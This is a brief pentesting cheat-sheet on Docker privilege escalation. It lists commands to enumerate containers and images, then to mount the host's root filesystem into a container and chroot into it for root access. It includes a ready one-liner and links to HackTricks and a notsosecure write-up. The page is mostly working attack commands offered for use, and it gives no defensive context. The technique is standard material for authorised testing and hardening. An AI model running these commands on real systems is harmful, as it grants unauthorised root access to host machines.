Docker privilege escalation

Collection of docker specific privesc vectors

[1]List active processes docker ps -a [2]List docker images docker images

[3]Easy privesc

c723nbsdf (this is the IMAGE ID of the docker pod) docker run -v /:/mnt/r3dcl1ff -ti c723nbsdf /bin/sh [4] Privesc with docker bash ID a)docker images

If you find a container running bash you can mount your own user Example: use the docker IMAGE ID for bash 0980cb958276 b) docker run -v /:/mnt/r3dcl1ff -ti 0980cb958276 change directory into r3dcl1ff and gain root access [5]One liner to gain root https://book.hacktricks.xyz/pentesting/2375-pentesting-docker docker run -it -v /:/host/ ubuntu:latest chroot /host/ bash

https://www.notsosecure.com/anatomy-of-a-hack-docker-registry/

Last updated